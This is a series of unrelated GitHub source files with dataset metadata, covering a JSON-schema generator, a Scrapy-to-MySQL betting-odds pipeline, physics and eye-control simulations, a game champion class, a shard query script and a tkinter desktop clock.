render_and_write_temp_schema(arr_filename, arr_template, arr_replace_l)\n\ndef schema_require_matching_id(runner, node, params):\n \"\"\"Generate schema that requires request id to match response id\n\n Arguments:\n runner (Runner): reference to Runner object\n node (Node): reference to Node object\n params (dict): test case parameters\n \n Returns:\n (str): file path for temporary schema\n \"\"\"\n\n template = \"rnaget-reqid-template.json\"\n schemas_by_obj_type = {\n \"projects\": \"rnaget-project.json\",\n \"studies\": \"rnaget-study.json\",\n \"expressions\": \"rnaget-expression.json\",\n \"continuous\": \"rnaget-continuous.json\"\n }\n\n obj_type = node.kwargs[\"obj_type\"]\n obj_id = node.kwargs[\"obj_instance\"][\"id\"]\n output_filename = \"temp.\" + obj_type + \".\" + obj_id + \".reqid.json\"\n\n replace_l = [\n [\"VAR_FILENAME\", output_filename],\n [\"VAR_REF\", schemas_by_obj_type[obj_type]],\n [\"VAR_ID\", obj_id]\n ]\n render_and_write_temp_schema(output_filename, template, replace_l)\n return output_filename\n\ndef schema_require_matching_search_params(runner, node, params, full=True):\n \"\"\"Generate schema requiring matching search params and response params\n\n Arguments:\n runner (Runner): reference to Runner object\n node (Node): reference to Node object\n params (dict): test case parameters\n full (bool): if true, create array schema requiring at 
least 1 element\n \n Returns:\n (str): file path for temporary schema\n \"\"\"\n\n schemas_by_obj_type = {\n \"projects\": \"rnaget-project.json\",\n \"studies\": \"rnaget-study.json\",\n \"expressions\": \"rnaget-ticket.json\",\n \"continuous\": \"rnaget-ticket.json\"\n }\n array_or_single_by_obj_type = {\n \"projects\": \"array\",\n \"studies\": \"array\",\n \"expressions\": \"single\",\n \"continuous\": \"single\"\n }\n\n obj_type = node.kwargs[\"obj_type\"]\n obj_id = node.kwargs[\"obj_instance\"][\"id\"]\n\n obj_template = \"rnaget-reqsearchparams-template.json\"\n arr_template = \"rnaget-reqsearchparams-array-template.json\"\n obj_filename = \"temp.\" + obj_type + \".\" + obj_id + \".reqsearchparams.json\"\n arr_filename = \"temp.\" + obj_type + \".\" + obj_id + \\\n \".reqsearchparams.array.json\"\n\n # format search parameters as JSON schema that can be subbed into the file\n params_json_schema = []\n for param_key in params.keys():\n if param_key != \"tags\":\n property_key = \"fileType\" if param_key == \"format\" else param_key\n properties = {\n \"type\": \"string\",\n \"enum\": [params[param_key]]\n }\n\n params_json_schema.append('\"%s\": %s' % (\n property_key, json.dumps(properties)))\n\n obj_replace_l = [\n [\"VAR_FILENAME\", obj_filename],\n [\"VAR_REF\", schemas_by_obj_type[obj_type]],\n ['\"VAR_SEARCH_PARAMS\": {}', \",\".join(params_json_schema)]\n ]\n arr_replace_l = [\n [\"VAR_ARRAY_FILENAME\", arr_filename],\n [\"VAR_SINGLE_FILENAME\", obj_filename]\n ]\n value = \"1\"\n\n render_endpoint_object_and_array(obj_filename, obj_template, obj_replace_l,\n arr_filename, arr_template, arr_replace_l, value, full=full)\n\n ret = arr_filename\n if array_or_single_by_obj_type[obj_type] == \"single\":\n ret = obj_filename\n \n return ret\n\ndef schema_require_matching_search_params_allow_empty(runner, node, params):\n \"\"\"Generate schema requiring matching params, allow empty arrays\n\n Arguments:\n runner (Runner): reference to Runner object\n node (Node): reference to Node object\n params (dict): test case parameters\n \n Returns:\n (str): file path for temporary schema\n \"\"\"\n\n return schema_require_matching_search_params(runner, node, params,\n full=False)\n","repo_name":"ga4gh-rnaseq/rnaget-compliance-suite","sub_path":"compliance_suite/functions/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18719064886","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport copy\nimport pymysql\nimport time\nfrom twisted.enterprise import adbapi\n# from twisted.internet import reactor\nfrom .items import MatchItem\nfrom .items import OddsItem\nfrom .items import OuOddsItem\nfrom .items import YaOddsItem\nfrom .items import DxOddsItem\nfrom .items import ImmOuOddsItem\nfrom .items import ImmYaOddsItem\nfrom .items import ImmDxOddsItem\nfrom .comm.MsDebug import MsLog\n\n\nclass MsPipeline(object):\n def __init__(self, db_pool):\n self.db_pool = db_pool\n self.b_bets = {}\n self.b_league = {}\n self.b_fteam = {}\n self.initdata('b_bets').addCallback(self.parseData, 'b_bets')\n self.initdata('b_league').addCallback(self.parseData, 'b_league')\n self.initdata('b_fteam').addCallback(self.parseData, 'b_fteam')\n self.iCount = 0\n self.tickcount = int(round(time.time() * 1000))\n 
self.odds_item_list = []\n\n    @classmethod\n    def from_settings(cls, settings):\n        db_pool = adbapi.ConnectionPool(\n            'pymysql',\n            host=settings[\"MYSQL_HOST\"],\n            db=settings[\"MYSQL_DB\"],\n            user=settings[\"MYSQL_USER\"],\n            password=settings[\"MYSQL_PASSWORD\"],\n            charset=\"utf8\",\n            cursorclass=pymysql.cursors.DictCursor,\n            use_unicode=True,\n            autocommit=0\n        )\n        return cls(db_pool)\n\n    def parseData(self, datas, table):\n        print(\"MS - printData[{0}]...\".format(table))\n        for data in datas:\n            if table == 'b_bets':\n                self.b_bets[data['name']] = data['id']\n            elif table == 'b_league':\n                self.b_league[data['name']] = data['id']\n            elif table == 'b_fteam':\n                self.b_fteam[data['name']] = data['id']\n\n    def _initCommit(self, cur):\n        print('MS - set autocommit')\n        cur.execute('set autocommit=0;')\n\n    def initCommit(self):\n        return self.db_pool.runInteraction(self._initCommit)\n\n    def initdata(self, table):\n        print('MS - initdata.....')\n        return self.db_pool.runQuery(\"select * from {0}\".format(table))\n\n    def handle_error(self, failure, item):\n        print('Failed to insert data. Reason: {}, offending item: {}'.format(failure, item))\n\n    # Get the bookmaker ID\n    def getbid(self, cur, tablename, name):\n        try:\n            sql = 'SELECT id FROM {0} WHERE name=%(name)s'.format(tablename)\n            values = {\n                'name': name\n            }\n            cur.execute(sql, values)\n            data = cur.fetchone()\n            if data is not None:\n                return data['id']\n            return -1\n        except Exception as e:\n            print(e)\n\n    # Add a bookmaker record\n    def addBaseItem(self, cur, tablename, name, fname=''):\n        try:\n            sql = 'INSERT INTO {0}(`name`, `fname`, `remark`) VALUES(%(name)s, %(fname)s, %(remark)s)'.format(tablename)\n            values = {\n                'name': name,\n                'fname': fname,\n                'remark': ''\n            }\n            cur.execute(sql, values)\n            return True\n        except Exception as e:\n            print(e)\n            return False\n\n    # Get the odds record ID\n    def getOddsId(self, cur, item):\n        try:\n            tablename = self.getTableNameByItem(item)\n\n            if tablename == '':\n                return -2\n\n            sql = '''\n                SELECT id FROM {0} WHERE mid=%(mid)s and bid=%(bid)s and cdate=%(cdate)s\n            '''.format(tablename)\n            values = {\n                'mid': item['mid'],\n                'bid': item['bid'],\n                'cdate': item['cdate']\n            }\n\n            cur.execute(sql, values)\n            data = cur.fetchone()\n            if data is not None:\n                return data['id']\n            return -1\n        except Exception as e:\n            print(e)\n\n    # Get the match ID\n    def getmid(self, cur, mid):\n        try:\n            sql = 'SELECT id FROM matchdata WHERE mid=%(mid)s'\n            values = {\n                'mid': mid\n            }\n            cur.execute(sql, values)\n            data = cur.fetchone()\n            if data is not None:\n                return data['id']\n            return -1\n        except Exception as e:\n            print(e)\n\n    # Add a match record\n    def addmItem(self, cur, item):\n        try:\n            sql = '''\n                INSERT INTO matchdata(`mid`, `lid`, `mtid`, `jq`, `dtid`, `sq`, `mdate`)\n                VALUES(%(mid)s, %(lid)s, %(mtid)s, %(jq)s, %(dtid)s, %(sq)s, %(mdate)s) \n            '''\n\n            values = {\n                'mid': item['mid'],\n                'lid': item['lid'],\n                'mtid': item['mtid'],\n                'jq': item['jq'],\n                'dtid': item['dtid'],\n                'sq': item['sq'],\n                'mdate': item['mdate']\n            }\n            cur.execute(sql, values)\n            return True\n        except Exception as e:\n            print(e)\n            return False\n\n    # Update a match record\n    def updmItem(self, cur, item):\n        try:\n            sql = '''\n                UPDATE matchdata\n                SET `mid`=%(mid)s, `lid`=%(lid)s, `mtid`=%(mtid)s, `jq`=%(jq)s, \n                `dtid`=%(dtid)s, `sq`=%(sq)s, `mdate`=%(mdate)s\n                WHERE `id` = %(id)s \n            '''\n\n            values = {\n                'id': item['id'],\n                'mid': item['mid'],\n                'lid': item['lid'],\n                'mtid': item['mtid'],\n                'jq': item['jq'],\n                'dtid': item['dtid'],\n                'sq': item['sq'],\n                'mdate': item['mdate']\n            }\n            cur.execute(sql, values)\n            return True\n        except Exception as e:\n            print(e)\n            return False\n\n    def process_item(self, items, 
spider):\n        try:\n            # Copy the item object (deep copy)\n            asynItems = copy.deepcopy(items)  # requires "import copy"\n\n            if isinstance(asynItems, MatchItem):\n                query = self.db_pool.runInteraction(self.process_md_item, asynItems)\n            elif isinstance(asynItems, OuOddsItem) or isinstance(asynItems, YaOddsItem) or isinstance(asynItems, DxOddsItem):\n                query = self.db_pool.runInteraction(self.process_odds_item, asynItems)\n            elif isinstance(asynItems, OddsItem):\n                query = self.db_pool.runInteraction(self.insert_odds, asynItems)\n            query.addErrback(self.handle_error, asynItems)\n            # return item\n            # print('MS - iCount: {} TimeCount: {}'.format(self.iCount, int(round(time.time() * 1000)) - self.tickcount))\n            self.iCount += 1\n        except Exception as e:\n            print('process_item err:{0}'.format(e))\n\n    def process_md_item(self, cursor, item):\n        try:\n            # Fill in the league info\n            # lsid = self.getbid(cursor, 'b_league', item['lname'])\n            lsid = self.b_league.get(item['lname'], -1)\n            if lsid == -1:\n                self.addBaseItem(cursor, 'b_league', item['lname'])\n                lsid = self.getbid(cursor, 'b_league', item['lname'])\n                if lsid == -1:\n                    return\n                self.b_league[item['lname']] = lsid\n            item['lid'] = lsid\n\n            # Fill in the team info - home team\n            # mtid = self.getbid(cursor, 'b_fteam', item['mtname'])\n            mtid = self.b_fteam.get(item['mtname'], -1)\n            if mtid == -1:\n                self.addBaseItem(cursor, 'b_fteam', item['mtname'], item['mtfname'])\n                mtid = self.getbid(cursor, 'b_fteam', item['mtname'])\n\n                if mtid == -1:\n                    return\n                self.b_fteam[item['mtname']] = mtid\n            item['mtid'] = mtid\n\n            # Fill in the team info - away team\n            # dtid = self.getbid(cursor, 'b_fteam', item['dtname'])\n            dtid = self.b_fteam.get(item['dtname'], -1)\n            if dtid == -1:\n                self.addBaseItem(cursor, 'b_fteam', item['dtname'], item['dtfname'])\n                dtid = self.getbid(cursor, 'b_fteam', item['dtname'])\n\n                if dtid == -1:\n                    return\n\n                self.b_fteam[item['dtname']] = dtid\n            item['dtid'] = dtid\n\n            # Insert or update the match table record\n            imid = self.getmid(cursor, item['mid'])\n            if imid == -1:\n                self.addmItem(cursor, item)\n            else:\n                item['id'] = imid\n                return self.updmItem(cursor, item)\n            return True\n        except Exception as e:\n            print(e)\n            return False\n\n    def process_odds_item(self, cursor, item):\n        try:\n            # Fill in the bookmaker info\n            bid = self.b_bets.get(item['bname'], -1)\n            if bid == -1:\n                self.addBaseItem(cursor, 'b_bets', item['bname'], '')\n                bid = self.getbid(cursor, 'b_bets', item['bname'])\n                if bid == -1:\n                    return False\n                self.b_bets[item['bname']] = bid\n            item['bid'] = bid\n\n            return self.addOddsItem(cursor, item)\n        except Exception as e:\n            print(e)\n            return False\n\n    def insert_odds(self, cursor, item):\n        try:\n            # Fill in the bookmaker info\n            bid = self.b_bets.get(item['bname'], -1)\n            if bid == -1:\n                self.addBaseItem(cursor, 'b_bets', item['bname'], '')\n                bid = self.getbid(cursor, 'b_bets', item['bname'])\n                if bid == -1:\n                    return False\n                self.b_bets[item['bname']] = bid\n            item['bid'] = bid\n\n            insert_sql = item.get_insert_sql()\n            cursor.execute(insert_sql)\n            return True\n        except Exception as e:\n            print(e)\n            return False\n\n    def close_spider(self, spider):\n        self.db_pool.close()\n        MsLog.debug('[{0}] finished'.format(spider.name))\n","repo_name":"mansoy/MsSpider","sub_path":"MsSpider/MsPipeline.py","file_name":"MsPipeline.py","file_ext":"py","file_size_in_byte":10227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28232962561","text":"import KUEM as EM\nimport numpy as np\nimport time as t\n\n# The size of the system\nSize = 49\n\nShowCount = 25\nbase_dx = np.array([25, 25, 25], dtype = float)\nbase_N = np.array([1, 1, 1], dtype = int)\nbase_dt = 2.5\nOmega 
= 2 * np.pi / 5\napprox_n = 100\nT = 10\nTRes = 0.1\n\n# -------------------------------------------------------------------------------\n\ndef J_LineCurrent(dx, N, x0, c, mu0):\n J = np.zeros((np.prod(N), 4))\n J[int(N[0] / 2) + 30 + (int(N[1] / 2) + 15) * N[0] :: N[0] * N[1], 3] = 1\n \n # Create function to return J\n # t: The time\n def GetJ(t):\n if Omega * t < 2 * np.pi:\n return J * np.sin(Omega * t)\n \n else:\n return J * 0\n \n # Return the function\n return GetJ \n\ndx = base_dx / (Size - 1)\ndt = base_dt / (Size - 1)\nN = base_N * Size\nN[2] = 1\nx0 = np.array(-base_dx / 2, dtype = float)\nEvalCount = int(T / dt)\nIntEvalCount = int(np.ceil(TRes / dt))\n\nIndex1 = np.floor(np.linspace(0, 1, ShowCount, endpoint = False) * N[0])\nIndex2 = np.floor(np.linspace(0, 1, ShowCount, endpoint = False) * N[1])\nIndex1, Index2 = np.meshgrid(Index1, Index2)\nx = np.empty((ShowCount, ShowCount, 3))\nx[:, :, 0] = x0[0] + Index1 * dx[0] * 1.0001\nx[:, :, 1] = x0[1] + Index2 * dx[1] * 1.0001\nx[:, :, 2] = 0\n\nSim = EM.sim(N, delta_x = base_dx, dt = dt, J = J_LineCurrent, approx_n = approx_n, x0 = x0, boundaries = [[\"flat\", \"flat\"], [\"flat\", \"flat\"], \"periodic\"])\n\ndef LinScale(x):\n return x\n\n#print(\"Estimated time: \" + str(Sim.estimate_dynamics(exact = False) * EvalCount))\n\n# Create video\nPoints = EM.sample_points_plane(np.array([1, 0, 0]), np.array([0, 1, 0]), np.array([0, 0, 0]), base_dx, np.array([100, 100], dtype = int))\nVideo = EM.video(\"DynTest\", FPS = 30)\nVideo.plot_scalar(Sim.sample_values(Sim.get_A()[:, 2], Points), clim = np.array([-0.08, 0.08]))\n#figB, axB, VideoB = EM.video_init(\"LineCurrentAlternatingB\", FPS = 30)\n#figS, axS, VideoS = EM.video_init(\"LineCurrentAlternatingS\", FPS = 30)\n#figA, axA, VideoA = EM.video_init(\"LineCurrentAlternatingA\", FPS = 30)\n\n#_, plotB = Sim.plot_B(x, axis1 = x[:, :, 0], axis2 = x[:, :, 1], clim = np.array([0.0005, 0.3]), ax = axB, video = True)\n#_, plotS = Sim.plot_S(x, axis1 = x[:, :, 0], axis2 = x[:, :, 1], clim = np.array([0.00001, 0.01]), ax = axS, video = True)\n#_, plotA = Sim.plot_AComp(x, 3, clim = np.array([-0.05, 0.05]), ax = axA, scale = LinScale)\n\ntime1 = t.time()\n\nfor i in range(int(EvalCount / IntEvalCount)):\n # Update potential\n for _ in range(IntEvalCount):\n Sim.step(exact = True)\n print(i / int(EvalCount / IntEvalCount))\n # Draw B field\n Video.update_scalar(Sim.sample_values(Sim.get_A()[:, 2], Points))\n #Sim.update_plot_B(plotB, x)\n #Sim.update_plot_S(plotS, x)\n #Sim.update_plot_AComp(plotA, x, 3, scale = LinScale)\n Video.update()\n # Update video\n #EM.video_update(figB, VideoB)\n #EM.video_update(figS, VideoS)\n #EM.video_update(figA, VideoA)\n\ntime2 = t.time()\n\nprint(\"Time: \" + str(time2 - time1))\n\n#Test.plot_B(x, axis1 = x[:, :, 0], axis2 = x[:, :, 1], clim = np.array([0.001, 0.1]), scale = scale)\n\nVideo.finish()\n# Close video\n#EM.video_finish(figB, VideoB)\n#EM.video_finish(figS, VideoS)\n#EM.video_finish(figA, VideoA)","repo_name":"RasmusBruhn/KUEM","sub_path":"OldExamples/EMDynTest.py","file_name":"EMDynTest.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27006204201","text":"from datetime import datetime\r\n\r\ncurrent_date = datetime.now().date().weekday()\r\n\r\nrecent_date = datetime(year=2022, month=2, day=4)\r\n# print(recent_date)\r\n\r\ndict = {\r\n \"One\": 1,\r\n \"2\": 
2\r\n}\r\n\r\nprint(list(dict.keys())[0])","repo_name":"Vincent-Muchiri/Python-Programming","sub_path":"Stock and Crypto Price Alert App[36] - API, SMS, Email/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31508855405","text":"import os\nimport random\nimport json\nfrom pathlib import Path\nfrom typing import List, Union, TYPE_CHECKING, Iterable\n\nfrom battle.construct.enum import EventType, Stat, State\n\nif TYPE_CHECKING:\n from battle.construct import Team\n from battle.construct.barrier import Barrier\n\nPROJECT_DIR = str(Path(os.path.abspath(__file__)).parent.parent.absolute())\n\n\ndef load_champion_data(path):\n result = {}\n with open(path + \"/resource/champion.json\", \"r\") as ch_json:\n champion_data = json.load(ch_json)\n list(map(lambda d: result.update({d[\"championId\"]: d}), champion_data))\n return result\n\n\nCHAMPION_DATA = load_champion_data(PROJECT_DIR)\n\n\nclass Champion:\n def __init__(self, champ_data, team: \"Team\"):\n self.name = champ_data[\"name\"]\n self.uuid = champ_data[\"uuid\"]\n self.id = champ_data[\"championId\"]\n self.level = champ_data[\"level\"]\n self.team: Team = team\n self.traits = champ_data[\"traits\"]\n self.skill = champ_data[\"skill\"]\n\n self.state: List[State] = []\n self.buff = {s: [] for s in Stat}\n self.event = {e: [] for e in EventType}\n self.stat = {s: champ_data[s] for s in Stat}\n self.hp = self.stat[Stat.MAX_HP]\n self.mp = self.stat[Stat.MP]\n self.barrier: List['Barrier'] = []\n\n self.action = None\n self.target: Union[Champion, None] = None\n\n def heal(self, value):\n self.hp = min(self.get_stat(Stat.MAX_HP), self.hp + value)\n\n def get_stat(self, stat_type) -> Union[int, float]:\n origin = self.stat[stat_type]\n buff = 0\n for b in self.buff[stat_type]:\n if b.is_absolute:\n origin += b.result(stat_type)\n continue\n buff += b.result(stat_type)\n\n return origin + (origin * buff)\n\n def use_barrier(self, dmg: Union[int, float]) -> Union[int, float]:\n residual = dmg\n for b in self.barrier:\n residual = b.calc(residual)\n if residual:\n break\n return residual\n\n def cause_event(self, event_type, **kwargs):\n for e in self.event[event_type]:\n e.get(event_type, **kwargs)\n\n def generate_mana(self, mana, cause_event=True):\n if cause_event:\n self.cause_event(EventType.GENERATE_MP, mp=mana, champion=self)\n self.mp = min(self.mp + mana, self.get_stat(Stat.MAX_MP))\n\n def get_damage(self, damage) -> Union[int, float, None]:\n damage.set_armor(self.get_stat(Stat.ARMOR))\n damage.set_magic_resistance(self.get_stat(Stat.MAGIC_RESISTANCE))\n damage.set_damage_reduce(self.get_stat(Stat.DAMAGE_REDUCE))\n reduced_damage = damage.calc()\n self.generate_mana(damage.get_pre_mitigated() * 0.06)\n\n if reduced_damage is None:\n print(f'{self.name}: Avoid damage')\n return None\n residual_damage = self.use_barrier(reduced_damage)\n self.hp = max(self.hp - residual_damage, 0)\n self.cause_event(EventType.GET_DAMAGE, damage=reduced_damage, hp=self.hp, max_hp=self.get_stat(Stat.MAX_HP))\n\n if not self.hp:\n self.set_death()\n print(f'{self.name}: Get Damage {reduced_damage} HP left {self.hp}')\n\n return reduced_damage\n\n def is_critical(self) -> bool:\n chance = min(100, self.get_stat(Stat.CRITICAL_CHANCE))\n result = random.choices([True, False], weights=[chance, 100 - chance])\n\n return result[0]\n\n def is_dodge(self) -> bool:\n chance = min(100, self.get_stat(Stat.DODGE_CHANCE))\n result = 
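# A minimal, self-contained sketch of the weighted coin flip behind the
# is_critical()/is_dodge() checks in champion.py above: random.choices() with
# weights [p, 100 - p] returns True with probability p/100. The sample size
# below is purely illustrative.
import random

def weighted_check(chance_percent: float) -> bool:
    chance = min(100, chance_percent)
    return random.choices([True, False], weights=[chance, 100 - chance])[0]

if __name__ == "__main__":
    hits = sum(weighted_check(25) for _ in range(100_000))
    print(hits / 100_000)  # ~0.25, matching a 25% critical/dodge chance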
random.choices([True, False], weights=[chance, 100 - chance])\n\n        return result[0]\n\n    def is_dead(self) -> bool:\n        if State.DEATH in self.state:\n            return True\n        return False\n\n    def is_mp_full(self) -> bool:\n        if self.mp >= self.get_stat(Stat.MAX_MP):\n            return True\n        return False\n\n    def set_death(self):\n        try:\n            if self.action is not None:\n                self.action.interrupt()\n                self.action = None\n        except RuntimeError:\n            print('Action already terminated')\n        self.state = [State.DEATH]\n\n    def __repr__(self):\n        return f'{self.name}'\n\n    def __iter__(self) -> Iterable[str]:\n        result = [\n            (\"name\", self.name),\n            (\"uuid\", self.uuid),\n            (\"id\", self.id),\n            (\"level\", self.level),\n            (\"team\", str(self.team)),\n            (\"traits\", self.traits),\n            (\"skill\", self.skill),\n            (\"state\", self.state),\n            (\"hp\", self.hp),\n            (\"mp\", self.mp),\n        ]\n        stat = {}\n        barrier = 0\n        for s in Stat:\n            stat[s] = self.get_stat(s)\n        for b in self.barrier:\n            barrier += b.value\n        result.append((\"stat\", stat))\n        result.append((\"barrier\", barrier))\n\n        return iter(result)\n","repo_name":"TikaWorld/TFT-simulator","sub_path":"src/battle/construct/champion.py","file_name":"champion.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38659639281","text":"import sys\nfrom framework.storage.mysql import MySQL\nfrom framework.storage.mysql_pool import MySQLPool\nfrom multiprocessing import Pool\nfrom pprint import pprint\n\nsql_file_name = sys.argv[1]\ntry:\n    pool_id = sys.argv[2]\nexcept IndexError:\n    pool_id = MySQLPool.MAIN\n\npool = MySQL.get_pool(pool_id)\n\ntry:\n    # multiprocessing.Pool expects an int (or None), so cast the CLI argument\n    num_threads = int(sys.argv[3])\nexcept IndexError:\n    num_threads = None\n\n\ndef get_query_string(file_name):\n    with open('sql/' + file_name) as data_file:\n        return data_file.read()\n\n\nquery_str = get_query_string(sql_file_name)\n\n\ndef run_one_query(shard_id):\n    # run the query against a single shard; kept at module level (rather than\n    # as a closure) so multiprocessing can pickle it for the worker processes\n    shard = pool.get_shard(shard_id)\n    query_res = shard.query(query_str, None, True)\n    shard.close()\n    return query_res\n\n\nres = []\nwith Pool(num_threads) as p:\n    res = p.map(run_one_query, range(pool.get_num_shards()))\n\npprint(res)\n","repo_name":"jordancode/phil_skeleton","sub_path":"phil_skeleton/scripts/all_shard_query.py","file_name":"all_shard_query.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43184052499","text":"import sys\n\nimport numpy\n\nfrom eye_plant import Eye\n\nfrom scipy.linalg import block_diag\n\n# the following two functions are used to store and retrieve\n# the appropriate matrices specific to this eye problem\n# This is done to avoid recomputing these\n\ndef compute_matrices(max_dur, dt):\n\n    eye = Eye(dt=dt)\n\n    # make F and G matrices as in the book\n    F = [numpy.eye(eye.state_dim)]\n    for _ in range(max_dur - 1):\n        # add to front of list\n        F.insert(0, numpy.dot(F[0], eye.A))\n\n    # block matrix\n    F = numpy.bmat(F)\n\n    # block diagonal matrix\n    G = block_diag(*[eye.B for _ in range(max_dur)])\n\n    numpy.savez('matrices', F=F, G=G)\n\n\ndef get_matrices(duration):\n    state_dim = 4\n    control_dim = 2\n    data = numpy.load('matrices.npz')\n    F = data['F']\n    G = data['G']\n    F = F[:, (-state_dim * duration):]\n    G = G[:(state_dim * duration), :control_dim * duration]\n\n    return F, G\n\n\n# if this 
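# A small self-contained demo of the two block-matrix helpers that
# compute_matrices() above relies on: numpy.bmat stacks blocks into one matrix
# and scipy.linalg.block_diag places blocks on the diagonal. The 2x2 blocks
# here are illustrative stand-ins, not the eye plant's actual A and B matrices.
import numpy
from scipy.linalg import block_diag

A = numpy.array([[1.0, 0.1], [0.0, 1.0]])
B = numpy.array([[0.0], [0.5]])

F = numpy.bmat([[numpy.dot(A, A), A, numpy.eye(2)]])  # horizontal block row
G = block_diag(*[B for _ in range(3)])                # block diagonal stack
print(F.shape, G.shape)                               # (2, 6) (6, 3)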
file is run, the matrices will be computed\nif __name__ == '__main__':\n dt = float(sys.argv[1])\n compute_matrices(max_dur=300, dt=dt)\n\n\nclass Optimal_Eye(object):\n \"\"\"The optimal eye controller in section 11.4 of Shadmehr book\n Signal-Dependent noise version\"\"\"\n\n def __init__(self, plant):\n #need plant and cost to construct the controller\n self.plant = plant\n\n def control_seq(self, init_state, target, k):\n \"\"\"Computes control sequence for the assigned duration.\n\n Parameters:\n -----------\n\n init_state: initial_state of the system\n target: the goal target, see pg.318\n k: the parameter in signal-dep noise on control\n \"\"\"\n\n # compute the duration from experimental data\n # see pg 285 in Shadmehr book\n distance = numpy.abs(target - init_state[0][0])\n duration = int(round(2.7 * distance + 23))\n\n # cost matrices, see section 11.4\n T = numpy.diag([5e9, 1e6, 80, 80])\n L = numpy.eye(duration * self.plant.B.shape[1])\n\n # set up matrices\n L = numpy.matrix(L, dtype=numpy.float64)\n C = numpy.matrix(self.plant.C, dtype=numpy.float64)\n F, G = get_matrices(duration)\n F = numpy.matrix(F, dtype=numpy.float64)\n G = numpy.matrix(G, dtype=numpy.float64)\n T = numpy.matrix(T, dtype=numpy.float64)\n # A to the power of duration\n A_p = numpy.dot(self.plant.A, F[:, :self.plant.state_dim])\n A_p = numpy.matrix(A_p, dtype=numpy.float64)\n\n S = G.T * F.T * C.T * T * C * F * G\n diag_S = numpy.diag(numpy.diag(S))\n temp = L + S + ((k**2) * diag_S)\n temp = numpy.linalg.inv(temp)\n temp = temp * G.T * F.T * C.T * T\n temp = temp * (target - C * A_p * init_state)\n\n control = temp\n return control\n","repo_name":"youssefzaky/phd","sub_path":"gaze_control/gaze_control/1D/optimal_eye.py","file_name":"optimal_eye.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39137679261","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter import font\nfrom tkinter import messagebox\nfrom tkinter.colorchooser import askcolor\n\nimport pygubu\n\nimport sys\nimport platform\nimport datetime\n\nimport src.Config as Config\nimport src.Logger as Logger\nimport src.About as About\nimport src.Fonts as Fonts\nimport src.License as License\nimport src.utils.pyDigitalKlock_utils as utils\nimport src.utils.fonts_utils as fu\n\nfrom src.projectPaths import *\n\n\nclass FirstApp:\n \"\"\"Support logic for the GUI of pyDigitalKlock.\n\n GUI elements held in pyDigitalKlock.ui, created using pygubu-designer.\n \"\"\"\n\n def __init__(self, myConfig, logger, master=None):\n\n self.logger = logger\n self.config = myConfig\n self.foreground = self.config.FOREGROUND\n self.background = self.config.BACKGROUND\n self.transparent = False\n\n self.row1 = 0\n self.new_font = None\n\n # Create a builder and setup resources path (if you have images)\n self.builder = builder = pygubu.Builder()\n builder.add_resource_path(RESOURCE_PATH)\n\n # Load an ui file\n builder.add_from_file(PROJECT_UI)\n\n # Create the mainwindow\n self.mainwindow = builder.get_object(\"mainwindow\", master)\n self.width = self.mainwindow.cget(\"width\")\n self.mainwindow.overrideredirect(True)\n\n # Create transparent window\n self.mainwindow.wm_attributes(\"-topmost\", True)\n self.mainwindow.wm_attributes(\"-transparentcolor\", \"gray\")\n self.mainwindow.wait_visibility()\n\n self.myAbout = About.About(self.mainwindow, self.config.NAME, self.config.VERSION)\n self.myLicense = License.License(self.mainwindow, 
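# The "main sequence" duration model in control_seq() above (duration =
# 2.7 * distance + 23, per the cited Shadmehr book) worked through for an
# illustrative 10-unit movement: int(round(2.7 * 10 + 23)) = 50 time steps.
# The control computation itself is a regularized least-squares solve; below is
# a toy self-contained version with made-up small matrices, using
# numpy.linalg.solve in place of the explicit inverse (a numerically safer
# variant of the same algebra, not the file's literal code).
import numpy

numpy.random.seed(0)
F = numpy.random.randn(4, 8)        # stand-ins for the stored F, G blocks
G = numpy.random.randn(8, 6)
C = numpy.eye(4)
T = numpy.diag([5e9, 1e6, 80, 80])  # same cost weighting as the class above
L = numpy.eye(6)
k = 0.1                             # signal-dependent noise scale
target = numpy.array([[1.0], [0.0], [0.0], [0.0]])

S = G.T @ F.T @ C.T @ T @ C @ F @ G
M = L + S + (k ** 2) * numpy.diag(numpy.diag(S))
u = numpy.linalg.solve(M, G.T @ F.T @ C.T @ T @ target)
print(u.shape)  # (6, 1): the flattened control sequence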
self.config.NAME, self.config.VERSION)\n self.myFont = Fonts.Font(self.mainwindow, logger)\n\n self.lbl_current_time = builder.get_object(\"lblTime\", master)\n self.lbl_today_date = builder.get_object(\"lblDate\", master)\n self.lbl_current_state = builder.get_object(\"lblState\", master)\n self.lbl_idle_time = builder.get_object(\"lblIdle\", master)\n\n self.lbl_current_time.configure(font=font.Font(family=self.config.FONT_NAME,size=self.config.FONT_SIZE,weight=\"normal\",))\n\n # Set main menu\n self.mainmenu = mainmenu = builder.get_object(\"mainmenu\", self.mainwindow)\n self.mainwindow.configure(menu=mainmenu)\n self.mainmenu.bind_all(\"\", self.quit) # Bind menu quit option to self.quit.\n\n # Connect to Delete event\n self.mainwindow.protocol(\"WM_DELETE_WINDOW\", self.quit)\n\n # Connect callbacks\n builder.connect_callbacks(self)\n\n # Bind mouse, so app can be moved.\n self.mainwindow.bind(\"\", self.startMove)\n self.mainwindow.bind(\"\", self.stopMove)\n self.mainwindow.bind(\"\", self.moving)\n\n self.mainwindow.geometry(\"+%s+%s\" % (self.config.X_POS, self.config.Y_POS))\n\n self.set_check()\n self.set_colours()\n self.set_time_date()\n\n def on_items_clicked(self, itemid):\n \"\"\"Handle the menu 